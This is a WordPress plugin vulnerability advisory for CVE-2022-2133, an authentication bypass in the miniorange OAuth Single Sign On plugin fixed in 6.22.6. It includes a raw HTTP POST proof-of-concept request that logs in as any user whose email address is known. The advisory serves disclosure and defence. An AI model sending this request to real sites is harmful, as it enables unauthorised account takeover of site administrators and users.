OAuth Single Sign On < 6.22.6 – Authentication Bypass | CVE 2022-2133 | Plugin Vulnerabilities

Description

The plugin doesn't validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user's email address.

Proof of Concept

POST / HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Connection: close

option=mooauth&email=admin@localhost.org

Affects Plugins

miniorange-login-with-eve-online-google-facebook

Fixed in 6.22.6

References

CVE

URL

https://lana.codes/lanavdb/12bb3c02-45f1-4ce8-8a5a-8b44352cf7fc/

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

e76939ca-180f-4472-a26a-e0c36cfd32de

Timeline

Publicly Published

2022-06-27 (about 3 years ago)

Added

2022-06-27 (about 3 years ago)

Last Updated

2023-04-01 (about 2 years ago)

Other

Published

Title

Published

2025-07-03

Title

WP Compress < 6.30.31 - Unauthenticated Broken Authentication

Published

2024-11-04

Title

Social Login - WordPress / WooCommerce Plugin < 2.7.8 - Authentication Bypass

Published

2022-01-17

Title

Coming Soon & Maintenance Plugin by NiteoThemes < 4.0.19 - Unauthenticated Arbitrary CSS Update

Published

2025-12-15

Title

WPCOM Member < 1.7.17 - Authentication Bypass via Weak OTP

Published

2018-02-28

Title

MainWP Child <= 3.4.4 - Authentication Bypass